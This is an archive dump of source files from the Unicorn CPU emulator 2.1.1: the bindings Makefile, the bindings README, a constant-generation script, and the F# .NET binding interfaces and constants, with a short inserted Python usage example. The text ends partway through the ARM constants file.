unicorn-2.1.1/SECURITY.md000066400000000000000000000000511467524106700147710ustar00rootroot00000000000000aquynh -at- gmail.com mio -at- lazym.io unicorn-2.1.1/TODO000066400000000000000000000000751467524106700136760ustar00rootroot00000000000000Moved to https://github.com/unicorn-engine/unicorn/milestonesunicorn-2.1.1/bindings/000077500000000000000000000000001467524106700150015ustar00rootroot00000000000000unicorn-2.1.1/bindings/Makefile000066400000000000000000000023611467524106700164430ustar00rootroot00000000000000# Unicorn Engine # By Nguyen Anh Quynh & Dang Hoang Vu, 2015 DIFF = diff SAMPLE_SOURCE = $(wildcard ../samples/*.c) SAMPLE = $(SAMPLE_SOURCE:../samples/%.c=%) SAMPLE := $(SAMPLE:mem_apis=) SAMPLE := $(SAMPLE:sample_batch_reg=) SAMPLE := $(SAMPLE:sample_x86_32_gdt_and_seg_regs=) SAMPLE := $(SAMPLE:shellcode=) UNAME_S := $(shell uname -s) ifeq ($(UNAME_S), Linux) ENV_VARS = LD_PRELOAD=librt.so LD_LIBRARY_PATH=../ DYLD_LIBRARY_PATH=../ else ENV_VARS = LD_LIBRARY_PATH=../ DYLD_LIBRARY_PATH=../ LIBUNICORN_PATH=$(TRAVIS_BUILD_DIR) endif .PHONY: build install python c clean check test build: $(MAKE) -C python gen_const $(MAKE) -C go gen_const $(MAKE) -C java gen_const $(MAKE) -C ruby gen_const python3 const_generator.py dotnet python3 const_generator.py pascal python3 const_generator.py zig install: build $(MAKE) -C python install $(MAKE) -C java install test: $(SAMPLE:%=%.py.test) c: $(MAKE) -C ../samples python: $(MAKE) -C python %.c.txt: c $(ENV_VARS) ../samples/$(@:%.c.txt=%) > $@ %.py.txt: python $(ENV_VARS) python3 python/$(@:%.txt=%) > $@ %.py.test: %.c.txt %.py.txt $(DIFF) -u $(@:%.py.test=%.c.txt) $(@:%.py.test=%.py.txt) clean: # rm -rf *.txt $(MAKE) -C python clean $(MAKE) -C java clean check: make -C python check
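The minimal Python usage example referenced in the README above. It is a sketch assuming the `unicorn` package is installed (e.g. via `pip install unicorn`) and mirrors the classic "INC ecx; DEC edx" tutorial snippet, using register constants from `unicorn.x86_const`.

```python
# Minimal sketch: emulate 32-bit x86 code (INC ecx; DEC edx) with the
# Python binding. Assumes `pip install unicorn`.
from unicorn import Uc, UC_ARCH_X86, UC_MODE_32
from unicorn.x86_const import UC_X86_REG_ECX, UC_X86_REG_EDX

X86_CODE32 = b"\x41\x4a"  # INC ecx; DEC edx
ADDRESS = 0x1000000       # arbitrary page-aligned base address

mu = Uc(UC_ARCH_X86, UC_MODE_32)
mu.mem_map(ADDRESS, 2 * 1024 * 1024)  # 2MB for code and scratch space
mu.mem_write(ADDRESS, X86_CODE32)
mu.reg_write(UC_X86_REG_ECX, 0x1234)
mu.reg_write(UC_X86_REG_EDX, 0x7890)

mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32))

print("ECX = 0x%x" % mu.reg_read(UC_X86_REG_ECX))  # expected 0x1235
print("EDX = 0x%x" % mu.reg_read(UC_X86_REG_EDX))  # expected 0x788f
```

The C API follows the same shape (`uc_open`, `uc_mem_map`, `uc_mem_write`, `uc_emu_start`, `uc_reg_read`); see docs/COMPILE.md and the samples referenced in the README above.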
unicorn-2.1.1/bindings/README000066400000000000000000000025051467524106700156630ustar00rootroot00000000000000This directory contains bindings & test code for Python, Java, Go and .NET. See /README or /README.TXT or /README.md for how to install each binding. The following bindings are contributed by community. - Java binding: by Chris Eagle. - Go binding: by Ryan Hileman. - .NET binding: by Antonio Parata. - Ruby binding: by Sascha Schirra - Haskell binding: by Adrian Herrera. - VB6 binding: David Zimmer. - FreePascal/Delphi binding: Mohamed Osama. More bindings created & maintained externally by community are available as follows. - UnicornPascal: Delphi/Free Pascal binding (by Stievie). https://github.com/stievie/UnicornPascal - Unicorn-Rs: Rust binding (by Sébastien Duquette) https://github.com/ekse/unicorn-rs - UnicornEngine: Perl binding (by Vikas Naresh Kumar) https://metacpan.org/pod/UnicornEngine - Unicorn.CR: Crystal binding (by Benoit Côté-Jodoin) https://github.com/Becojo/unicorn.cr - Deimos/unicorn: D binding (by Vladimir Panteleev) https://github.com/D-Programming-Deimos/unicorn - Unicorn-Lua: Lua binding (by Diego Argueta) https://github.com/dargueta/unicorn-lua - pharo-unicorn: Pharo binding (by Guille Polito) https://github.com/guillep/pharo-unicorn - Unicorn.js: JavaScript binding (by Alexandro Sanchez) https://github.com/AlexAltea/unicorn.js unicorn-2.1.1/bindings/const_generator.py000066400000000000000000000275251467524106700205620ustar00rootroot00000000000000#!/usr/bin/env python3 # Unicorn Engine # By Dang Hoang Vu, 2013 from __future__ import print_function import sys, re, os INCL_DIR = os.path.join('..', 'include', 'unicorn') include = [ 'arm.h', 'arm64.h', 'mips.h', 'x86.h', 'sparc.h', 'm68k.h', 'ppc.h', 'riscv.h', 's390x.h', 'tricore.h', 'unicorn.h' ] template = { 'python': { 'header': "# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [%s_const.py]\n", 'footer': "", 'line_format': 'UC_%s = %s\n', 'out_file': './python/unicorn/%s_const.py', # prefixes for constant filenames of all archs - case sensitive 'arm.h': 'arm', 'arm64.h': 'arm64', 'mips.h': 'mips', 'x86.h': 'x86', 'sparc.h': 'sparc', 'm68k.h': 'm68k', 'ppc.h': 'ppc', 'riscv.h': 'riscv', 's390x.h' : 's390x', 'tricore.h' : 'tricore', 'unicorn.h': 'unicorn', 'comment_open': '#', 'comment_close': '', }, 'ruby': { 'header': "# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [%s_const.rb]\n\nmodule UnicornEngine\n", 'footer': "end", 'line_format': '\tUC_%s = %s\n', 'out_file': './ruby/unicorn_gem/lib/unicorn_engine/%s_const.rb', # prefixes for constant filenames of all archs - case sensitive 'arm.h': 'arm', 'arm64.h': 'arm64', 'mips.h': 'mips', 'x86.h': 'x86', 'sparc.h': 'sparc', 'm68k.h': 'm68k', 'ppc.h': 'ppc', 'riscv.h': 'riscv', 's390x.h' : 's390x', 'tricore.h' : 'tricore', 'unicorn.h': 'unicorn', 'comment_open': '#', 'comment_close': '', }, 'go': { 'header': "package unicorn\n// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [%s_const.go]\nconst (\n", 'footer': ")", 'line_format': '\t%s = %s\n', 'out_file': './go/unicorn/%s_const.go', # prefixes for constant filenames of all archs - case sensitive 'arm.h': 'arm', 'arm64.h': 'arm64', 'mips.h': 'mips', 'x86.h': 'x86', 'sparc.h': 'sparc', 'm68k.h': 'm68k', 'ppc.h': 'ppc', 'riscv.h': 'riscv', 's390x.h' : 's390x', 'tricore.h' : 'tricore', 'unicorn.h': 'unicorn', 'comment_open': '//', 'comment_close': '', }, 'java': { 'header': "// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT\n\npackage unicorn;\n\npublic interface %sConst {\n", 'footer': "\n}\n", 'line_format': ' public static final int UC_%s = %s;\n', 'out_file': './java/src/main/java/unicorn/%sConst.java', # prefixes for constant filenames of all archs - case sensitive 'arm.h': 'Arm', 'arm64.h': 'Arm64', 'mips.h': 'Mips', 'x86.h': 'X86', 'sparc.h': 'Sparc', 'm68k.h': 'M68k', 'ppc.h': 'Ppc', 'riscv.h': 'Riscv', 's390x.h' : 'S390x', 'tricore.h' : 'TriCore', 'unicorn.h': 'Unicorn', 'comment_open': ' //', 'comment_close': '', }, 'dotnet': { 'header': "// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT\n\nnamespace UnicornEngine.Const\n\nopen System\n\n[<AutoOpen>]\nmodule %s =\n", 'footer': "\n", 'line_format': ' let UC_%s = %s\n', 'out_file': os.path.join('dotnet', 'UnicornEngine', 'Const', '%s.fs'), # prefixes for constant filenames of all archs - case sensitive 'arm.h': 'Arm', 'arm64.h': 'Arm64', 'mips.h': 'Mips', 'x86.h': 'X86', 'sparc.h': 'Sparc', 'm68k.h': 'M68k', 'ppc.h': 'Ppc', 'riscv.h': 'Riscv', 's390x.h' : 'S390x', 'tricore.h' : 'TriCore', 'unicorn.h': 'Common', 'comment_open': ' //', 'comment_close': '', }, 'pascal': { 'header': "// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT\n\nunit %sConst;\n\ninterface\n\nconst", 'footer': "\nimplementation\nend.", 'line_format': ' UC_%s = %s;\n', 'out_file': os.path.join('pascal', 'unicorn', '%sConst.pas'), # prefixes for constant filenames of all archs - case sensitive 'arm.h': 'Arm', 'arm64.h': 'Arm64', 'mips.h': 'Mips', 'x86.h': 'X86', 'sparc.h': 'Sparc', 'm68k.h': 'M68k', 'ppc.h': 'Ppc', 'riscv.h': 'Riscv', 's390x.h' : 'S390x', 'tricore.h' : 'TriCore', 'unicorn.h': 'Unicorn', 'comment_open': '//', 'comment_close': '', }, 'zig': { 'header': "// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT\n\npub const %sConst = enum(c_int) {\n", 'footer': "\n};\n", 'line_format': '\t%s = %s,\n', 'out_file': './zig/unicorn/%s_const.zig', # prefixes for constant filenames of all archs - case sensitive 'arm.h': 'arm', 'arm64.h': 'arm64', 'mips.h': 'mips', 'x86.h': 'x86', 'sparc.h': 'sparc', 'm68k.h': 'm68k', 'ppc.h': 'ppc', 'riscv.h': 'riscv', 's390x.h' : 's390x', 'tricore.h' : 'tricore', 'unicorn.h': 'unicorn', 'comment_open': '//', 'comment_close': '', }, } # markup for comments to be added to autogen files MARKUP = '//>' def gen(lang): global include, INCL_DIR templ = template[lang] for target in include: prefix = templ[target] outfn = templ['out_file'] % prefix outfile = open(outfn + ".tmp", 'wb') # open as binary prevents windows newlines outfile.write((templ['header'] % prefix).encode("utf-8")) if target == 'unicorn.h': prefix = '' with open(os.path.join(INCL_DIR, target)) as f: lines = f.readlines() previous = {} count = 0 skip = 0 in_comment = False for lno, line in enumerate(lines): if "/*" in line: in_comment = True if "*/" in line: in_comment = False if in_comment: continue if skip > 0: # Due to clang-format, values may come up in the next line skip -= 1 continue line = line.strip() if line.startswith(MARKUP): # markup for comments outfile.write(("\n%s%s%s\n" %(templ['comment_open'], \ line.replace(MARKUP, ''), templ['comment_close'])).encode("utf-8")) continue if line == '' or line.startswith('//'): continue tmp = line.strip().split(',') if len(tmp) >= 2 and tmp[0] != "#define" and not tmp[0].startswith("UC_"): continue for t in tmp: t = t.strip() if not t or t.startswith('//'): continue f = re.split(r'\s+', t) # parse #define UC_TARGET (num) define = False if f[0] == '#define' and len(f) >= 3: define = True f.pop(0)
f.insert(1, '=') if f[0].startswith("UC_" + prefix.upper()) or f[0].startswith("UC_CPU"): if len(f) > 1 and f[1] not in ('//', '='): print("WARNING: Unable to convert %s" % f) print(" Line =", line) continue elif len(f) > 1 and f[1] == '=': # Like: # UC_A = # (1 << 2) # #define UC_B \ # (UC_A | UC_C) # Let's search the next line if len(f) == 2: if lno == len(lines) - 1: print("WARNING: Unable to convert %s" % f) print(" Line =", line) continue skip += 1 next_line = lines[lno + 1] next_line_tmp = next_line.strip().split(",") rhs = next_line_tmp[0] elif f[-1] == "\\": idx = 0 rhs = "" while True: idx += 1 if lno + idx == len(lines): print("WARNING: Unable to convert %s" % f) print(" Line =", line) continue skip += 1 next_line = lines[lno + idx] next_line_f = re.split('\s+', next_line.strip()) if next_line_f[-1] == "\\": rhs += "".join(next_line_f[:-1]) else: rhs += next_line.strip() break else: rhs = ''.join(f[2:]) else: rhs = str(count) lhs = f[0].strip() #print(f'lhs: {lhs} rhs: {rhs} f:{f}') # evaluate bitshifts in constants e.g. "UC_X86 = 1 << 1" match = re.match(r'(?P\s*\d+\s*<<\s*\d+\s*)', rhs) if match: rhs = str(eval(match.group(1))) else: # evaluate references to other constants e.g. "UC_ARM_REG_X = UC_ARM_REG_SP" match = re.match(r'^([^\d]\w+)$', rhs) if match: rhs = previous[match.group(1)] if not rhs.isdigit(): for k, v in previous.items(): rhs = re.sub(r'\b%s\b' % k, v, rhs) rhs = str(eval(rhs)) lhs_strip = re.sub(r'^UC_', '', lhs) count = int(rhs) + 1 if (count == 1): outfile.write(("\n").encode("utf-8")) outfile.write((templ['line_format'] % (lhs_strip, rhs)).encode("utf-8")) previous[lhs] = str(rhs) outfile.write((templ['footer']).encode("utf-8")) outfile.close() if os.path.isfile(outfn): with open(outfn, "rb") as infile: cur_data = infile.read() with open(outfn + ".tmp", "rb") as infile: new_data = infile.read() if cur_data == new_data: os.unlink(outfn + ".tmp") else: os.unlink(outfn) os.rename(outfn + ".tmp", outfn) else: os.rename(outfn + ".tmp", outfn) def main(): lang = sys.argv[1] if lang == "all": for lang in template.keys(): print("Generating constants for {}".format(lang)) gen(lang) else: if not lang in template: raise RuntimeError("Unsupported binding %s" % lang) gen(lang) if __name__ == "__main__": if len(sys.argv) < 2: print("Usage:", sys.argv[0], " ") print("Supported: {}".format(["all"] + [x for x in template.keys()])) sys.exit(1) main() unicorn-2.1.1/bindings/dotnet/000077500000000000000000000000001467524106700162765ustar00rootroot00000000000000unicorn-2.1.1/bindings/dotnet/README.md000066400000000000000000000020311467524106700175510ustar00rootroot00000000000000This documentation explains how to use the .NET binding for Unicorn from source. 0. Install the core engine as a dependency Follow README in the root directory to compile & install the core. 1. Compile the code You need to have at least version 5.0 of .NET installed. 1. Windows To compile the code open the UnicornSln.sln with Microsoft Visual Studio 12 or with a newer version and just press Ctrl+Shift+B to build the solution. 2. Linux To compile the code open a terminal in this directory and enter the following command to build the solution: `dotnet build` 2. Usage The solution includes the testing project UnicornTests with examples of usage. In order to use the library in your project just add a reference to the .NET library and be sure to copy the unmanaged unicorn.dll library in the output directory. 
The naming convention used is Upper Camel Case, meaning that to invoke the uc_mem_read function you have to look for the MemRead method.

unicorn-2.1.1/bindings/dotnet/UnicornDotNet.sln

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.23107.0
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "UnicornSamples", "UnicornSamples\UnicornSamples.csproj", "{B80B5987-1E24-4309-8BF9-C4F91270F21C}"
EndProject
Project("{F2A71F9B-5D33-465A-A702-920D77279786}") = "UnicornEngine", "UnicornEngine\UnicornEngine.fsproj", "{0C21F1C1-2725-4A46-9022-1905F85822A5}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|Any CPU = Debug|Any CPU
		Release|Any CPU = Release|Any CPU
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{B80B5987-1E24-4309-8BF9-C4F91270F21C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
		{B80B5987-1E24-4309-8BF9-C4F91270F21C}.Debug|Any CPU.Build.0 = Debug|Any CPU
		{B80B5987-1E24-4309-8BF9-C4F91270F21C}.Release|Any CPU.ActiveCfg = Release|Any CPU
		{B80B5987-1E24-4309-8BF9-C4F91270F21C}.Release|Any CPU.Build.0 = Release|Any CPU
		{0C21F1C1-2725-4A46-9022-1905F85822A5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
		{0C21F1C1-2725-4A46-9022-1905F85822A5}.Debug|Any CPU.Build.0 = Debug|Any CPU
		{0C21F1C1-2725-4A46-9022-1905F85822A5}.Release|Any CPU.ActiveCfg = Release|Any CPU
		{0C21F1C1-2725-4A46-9022-1905F85822A5}.Release|Any CPU.Build.0 = Release|Any CPU
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
EndGlobal

unicorn-2.1.1/bindings/dotnet/UnicornEngine/

unicorn-2.1.1/bindings/dotnet/UnicornEngine/Binding/

unicorn-2.1.1/bindings/dotnet/UnicornEngine/Binding/BindingFactory.fs

namespace UnicornEngine.Binding

module BindingFactory =

    let mutable _instance = NativeBinding.instance

    let setDefaultBinding(binding: IBinding) = _instance <- binding

    let getDefault() = _instance

unicorn-2.1.1/bindings/dotnet/UnicornEngine/Binding/IBinding.fs

namespace UnicornEngine.Binding

open System

type IBinding =
    interface
        abstract Version : UIntPtr * UIntPtr -> Int32
        abstract ArchSupported : Int32 -> Boolean
        abstract UcOpen : UInt32 * UInt32 * UIntPtr array -> Int32
        abstract Close : UIntPtr -> Int32
        abstract Strerror : Int32 -> IntPtr
        abstract Errono : UIntPtr -> Int32
        abstract RegRead : UIntPtr * Int32 * Byte array -> Int32
        abstract RegWrite : UIntPtr * Int32 * Byte array -> Int32
        abstract MemRead : UIntPtr * UInt64 * Byte array * UIntPtr -> Int32
        abstract MemWrite : UIntPtr * UInt64 * Byte array * UIntPtr -> Int32
        abstract EmuStart : UIntPtr * UInt64 * UInt64 * UInt64 * UInt64 -> Int32
        abstract EmuStop : UIntPtr -> Int32
        abstract HookDel : UIntPtr * UIntPtr -> Int32
        abstract MemMap : UIntPtr * UInt64 * UIntPtr * UInt32 -> Int32
        abstract MemMapPtr : UIntPtr * UInt64 * UIntPtr * UInt32 * UIntPtr -> Int32
        abstract MemUnmap : UIntPtr * UInt64 * UIntPtr -> Int32
        abstract MemProtect : UIntPtr * UInt64 * UIntPtr * UInt32 -> Int32
        abstract HookAddNoarg : UIntPtr * UIntPtr * Int32 * UIntPtr * IntPtr * UInt64 * UInt64 -> Int32
        abstract HookAddArg0 : UIntPtr * UIntPtr * Int32 * UIntPtr * IntPtr * UInt64 * UInt64 * Int32 -> Int32
        abstract HookAddArg0Arg1 : UIntPtr * UIntPtr * Int32 * UIntPtr * IntPtr * UInt64 * UInt64 * UInt64 * UInt64 -> Int32
    end

unicorn-2.1.1/bindings/dotnet/UnicornEngine/Binding/MockBinding.fs

namespace UnicornEngine.Binding

open System

module internal MockBinding =
    // by using mutable variables it is easier to create testing code
    let mutable version = fun(major, minor) -> 0
    let mutable uc_open = fun(arch, mode, uc) -> 0
    let mutable close = fun(eng) -> 0
    let mutable mem_map = fun(eng, adress, size, perm) -> 0
    let mutable mem_map_ptr = fun(eng, address, size, perms, ptr) -> 0
    let mutable mem_unmap = fun(eng, address, size) -> 0
    let mutable mem_protect = fun(eng, address, size, perms) -> 0
    let mutable mem_write = fun(eng, adress, value, size) -> 0
    let mutable mem_read = fun(eng, adress, value, size) -> 0
    let mutable reg_write = fun(eng, regId, value) -> 0
    let mutable reg_read = fun(eng, regId, value) -> 0
    let mutable emu_start = fun(eng, beginAddr, untilAddr, timeout, count) -> 0
    let mutable emu_stop = fun(eng) -> 0
    let mutable hook_del = fun(eng, hook) -> 0
    let mutable arch_supported = fun(arch) -> true
    let mutable errno = fun(eng) -> 0
    let mutable strerror = fun(err) -> new nativeint(0)
    let mutable hook_add_noarg = fun(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) -> 0
    let mutable hook_add_arg0 = fun(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) -> 0
    let mutable hook_add_arg0_arg1 = fun(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) -> 0

    let instance = {new IBinding with
        member thi.Version(major, minor) = version(major, minor)
        member thi.UcOpen(arch, mode, uc) = uc_open(arch, mode, uc)
        member thi.Close(eng) = close(eng)
        member thi.MemMap(eng, adress, size, perm) = mem_map(eng, adress, size, perm)
        member thi.MemWrite(eng, adress, value, size) = mem_write(eng, adress, value, size)
        member thi.MemRead(eng, adress, value, size) = mem_read(eng, adress, value, size)
        member thi.RegWrite(eng, regId, value) = reg_write(eng, regId, value)
        member thi.RegRead(eng, regId, value) = reg_read(eng, regId, value)
        member thi.EmuStart(eng, beginAddr, untilAddr, timeout, count) = emu_start(eng, beginAddr, untilAddr, timeout, count)
        member thi.EmuStop(eng) = emu_stop(eng)
        member this.HookDel(eng, hook) = hook_del(eng, hook)
        member thi.ArchSupported(arch) = arch_supported(arch)
        member thi.Errono(eng) = errno(eng)
        member thi.Strerror(err) = strerror(err)
        member this.MemMapPtr(eng, address, size, perms, ptr) = mem_map_ptr(eng, address, size, perms, ptr)
        member this.MemUnmap(eng, address, size) = mem_unmap(eng, address, size)
        member this.MemProtect(eng, address, size, perms) = mem_protect(eng, address, size, perms)
        member thi.HookAddNoarg(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) = hook_add_noarg(eng, hh, callbackType, callback, userData, hookBegin, hookEnd)
        member thi.HookAddArg0(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) = hook_add_arg0(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0)
        member thi.HookAddArg0Arg1(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) = hook_add_arg0_arg1(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1)
    }
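Taken together, BindingFactory, IBinding and the generated constant modules are enough to drive a full emulation round-trip. The fragment below is a minimal sketch and is not part of the source tree: it assumes an x86-32 guest, pulls UC_ARCH_X86, UC_MODE_32 and UC_PROT_ALL from Common.fs (shown later in this tree) and UC_X86_REG_ECX from the X86 module that const_generator.py emits from x86.h, and ignores the Int32 return codes that real code should compare against UC_ERR_OK.

    // BindingSketch.fs - hypothetical example, not shipped with the binding
    module BindingSketch =

        open System
        open UnicornEngine.Binding
        open UnicornEngine.Const

        let run() =
            let binding = BindingFactory.getDefault()

            // uc_open: the engine handle comes back through a one-element array
            let engine = [| UIntPtr.Zero |]
            binding.UcOpen(uint32 Common.UC_ARCH_X86, uint32 Common.UC_MODE_32, engine) |> ignore
            let eng = engine.[0]

            // map 4 KB, copy a single instruction in and run it: 0x41 = INC ecx
            let address = 0x1000000UL
            let code = [| 0x41uy |]
            binding.MemMap(eng, address, UIntPtr(0x1000u), uint32 Common.UC_PROT_ALL) |> ignore
            binding.MemWrite(eng, address, code, UIntPtr(uint32 code.Length)) |> ignore
            binding.EmuStart(eng, address, address + uint64 code.Length, 0UL, 0UL) |> ignore

            // register values travel as raw byte buffers (4 bytes for a 32-bit guest)
            let ecx = Array.zeroCreate<byte> 4
            binding.RegRead(eng, X86.UC_X86_REG_ECX, ecx) |> ignore
            printfn "ECX = %d" (BitConverter.ToUInt32(ecx, 0))

            binding.Close(eng) |> ignore

MockBinding exists precisely so that code like this can be exercised without loading the native unicorn library: assign stub closures to its mutable function slots and install it with BindingFactory.setDefaultBinding(MockBinding.instance) (from test code inside the assembly, since the module is internal).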
unicorn-2.1.1/bindings/dotnet/UnicornEngine/Binding/NativeBinding.fs000066400000000000000000000130021467524106700254620ustar00rootroot00000000000000namespace UnicornEngine.Binding open System open System.Runtime.InteropServices module NativeBinding = [] module private Imported = [] extern Int32 uc_version(UIntPtr major, UIntPtr minor) [] extern Int32 uc_open(UInt32 arch, UInt32 mode, UIntPtr[] engine) [] extern Int32 uc_close(UIntPtr eng) [] extern Int32 uc_mem_map(UIntPtr eng, UInt64 address, UIntPtr size, UInt32 perm) [] extern Int32 uc_mem_map_ptr(UIntPtr eng, UInt64 address, UIntPtr size, UInt32 perm, UIntPtr ptr) [] extern Int32 uc_mem_unmap(UIntPtr eng, UInt64 address, UIntPtr size) [] extern Int32 uc_mem_protect(UIntPtr eng, UInt64 address, UIntPtr size, UInt32 perms) [] extern Int32 uc_mem_write(UIntPtr eng, UInt64 address, Byte[] value, UIntPtr size) [] extern Int32 uc_mem_read(UIntPtr eng, UInt64 address, Byte[] value, UIntPtr size) [] extern Int32 uc_reg_write(UIntPtr eng, Int32 regId, Byte[] value) [] extern Int32 uc_reg_read(UIntPtr eng, Int32 regId, Byte[] value) [] extern Int32 uc_emu_start(UIntPtr eng, UInt64 beginAddr, UInt64 untilAddr, UInt64 timeout, UInt64 count) [] extern Int32 uc_emu_stop(UIntPtr eng) [] extern Int32 uc_hook_del(UIntPtr eng, UIntPtr hook) [] extern Boolean uc_arch_supported(Int32 arch) [] extern Int32 uc_errno(UIntPtr eng) [] extern IntPtr uc_strerror(Int32 err) [] extern Int32 uc_hook_add_noarg(UIntPtr eng, UIntPtr hh, Int32 callbackType, UIntPtr callback, IntPtr userData, UInt64 hookbegin, UInt64 hookend) [] extern Int32 uc_hook_add_arg0(UIntPtr eng, UIntPtr hh, Int32 callbackType, UIntPtr callback, IntPtr userData, UInt64 hookbegin, UInt64 hookend, Int32 arg0) [] extern Int32 uc_hook_add_arg0_arg1(UIntPtr eng, UIntPtr hh, Int32 callbackType, UIntPtr callback, IntPtr userData, UInt64 hookbegin, UInt64 hookend, UInt64 arg0, UInt64 arg1) let instance = {new IBinding with member thi.Version(major, minor) = uc_version(major, minor) member thi.UcOpen(arch, mode, uc) = uc_open(arch, mode, uc) member thi.Close(eng) = uc_close(eng) member thi.MemMap(eng, adress, size, perm) = uc_mem_map(eng, adress, size, perm) member thi.MemWrite(eng, adress, value, size) = uc_mem_write(eng, adress, value, size) member thi.MemRead(eng, adress, value, size) = uc_mem_read(eng, adress, value, size) member thi.RegWrite(eng, regId, value) = uc_reg_write(eng, regId, value) member thi.RegRead(eng, regId, value) = uc_reg_read(eng, regId, value) member thi.EmuStart(eng, beginAddr, untilAddr, timeout, count) = uc_emu_start(eng, beginAddr, untilAddr, timeout, count) member thi.EmuStop(eng) = uc_emu_stop(eng) member this.HookDel(eng, hook) = uc_hook_del(eng, hook) member thi.ArchSupported(arch) = uc_arch_supported(arch) member thi.Errono(eng) = uc_errno(eng) member thi.Strerror(err) = uc_strerror(err) member this.MemMapPtr(eng, address, size, perms, ptr) = uc_mem_map_ptr(eng, address, size, perms, ptr) member this.MemUnmap(eng, address, size) = uc_mem_unmap(eng, address, size) member this.MemProtect(eng, address, size, perms) = uc_mem_protect(eng, address, size, perms) member thi.HookAddNoarg(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) = uc_hook_add_noarg(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) member thi.HookAddArg0(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) = uc_hook_add_arg0(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) member thi.HookAddArg0Arg1(eng, hh, callbackType, callback, userData, 
hookBegin, hookEnd, arg0, arg1) = uc_hook_add_arg0_arg1(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) }unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/000077500000000000000000000000001467524106700221275ustar00rootroot00000000000000unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/Arm.fs000066400000000000000000000127471467524106700232130ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module Arm = // ARM CPU let UC_CPU_ARM_926 = 0 let UC_CPU_ARM_946 = 1 let UC_CPU_ARM_1026 = 2 let UC_CPU_ARM_1136_R2 = 3 let UC_CPU_ARM_1136 = 4 let UC_CPU_ARM_1176 = 5 let UC_CPU_ARM_11MPCORE = 6 let UC_CPU_ARM_CORTEX_M0 = 7 let UC_CPU_ARM_CORTEX_M3 = 8 let UC_CPU_ARM_CORTEX_M4 = 9 let UC_CPU_ARM_CORTEX_M7 = 10 let UC_CPU_ARM_CORTEX_M33 = 11 let UC_CPU_ARM_CORTEX_R5 = 12 let UC_CPU_ARM_CORTEX_R5F = 13 let UC_CPU_ARM_CORTEX_A7 = 14 let UC_CPU_ARM_CORTEX_A8 = 15 let UC_CPU_ARM_CORTEX_A9 = 16 let UC_CPU_ARM_CORTEX_A15 = 17 let UC_CPU_ARM_TI925T = 18 let UC_CPU_ARM_SA1100 = 19 let UC_CPU_ARM_SA1110 = 20 let UC_CPU_ARM_PXA250 = 21 let UC_CPU_ARM_PXA255 = 22 let UC_CPU_ARM_PXA260 = 23 let UC_CPU_ARM_PXA261 = 24 let UC_CPU_ARM_PXA262 = 25 let UC_CPU_ARM_PXA270 = 26 let UC_CPU_ARM_PXA270A0 = 27 let UC_CPU_ARM_PXA270A1 = 28 let UC_CPU_ARM_PXA270B0 = 29 let UC_CPU_ARM_PXA270B1 = 30 let UC_CPU_ARM_PXA270C0 = 31 let UC_CPU_ARM_PXA270C5 = 32 let UC_CPU_ARM_MAX = 33 let UC_CPU_ARM_ENDING = 34 // ARM registers let UC_ARM_REG_INVALID = 0 let UC_ARM_REG_APSR = 1 let UC_ARM_REG_APSR_NZCV = 2 let UC_ARM_REG_CPSR = 3 let UC_ARM_REG_FPEXC = 4 let UC_ARM_REG_FPINST = 5 let UC_ARM_REG_FPSCR = 6 let UC_ARM_REG_FPSCR_NZCV = 7 let UC_ARM_REG_FPSID = 8 let UC_ARM_REG_ITSTATE = 9 let UC_ARM_REG_LR = 10 let UC_ARM_REG_PC = 11 let UC_ARM_REG_SP = 12 let UC_ARM_REG_SPSR = 13 let UC_ARM_REG_D0 = 14 let UC_ARM_REG_D1 = 15 let UC_ARM_REG_D2 = 16 let UC_ARM_REG_D3 = 17 let UC_ARM_REG_D4 = 18 let UC_ARM_REG_D5 = 19 let UC_ARM_REG_D6 = 20 let UC_ARM_REG_D7 = 21 let UC_ARM_REG_D8 = 22 let UC_ARM_REG_D9 = 23 let UC_ARM_REG_D10 = 24 let UC_ARM_REG_D11 = 25 let UC_ARM_REG_D12 = 26 let UC_ARM_REG_D13 = 27 let UC_ARM_REG_D14 = 28 let UC_ARM_REG_D15 = 29 let UC_ARM_REG_D16 = 30 let UC_ARM_REG_D17 = 31 let UC_ARM_REG_D18 = 32 let UC_ARM_REG_D19 = 33 let UC_ARM_REG_D20 = 34 let UC_ARM_REG_D21 = 35 let UC_ARM_REG_D22 = 36 let UC_ARM_REG_D23 = 37 let UC_ARM_REG_D24 = 38 let UC_ARM_REG_D25 = 39 let UC_ARM_REG_D26 = 40 let UC_ARM_REG_D27 = 41 let UC_ARM_REG_D28 = 42 let UC_ARM_REG_D29 = 43 let UC_ARM_REG_D30 = 44 let UC_ARM_REG_D31 = 45 let UC_ARM_REG_FPINST2 = 46 let 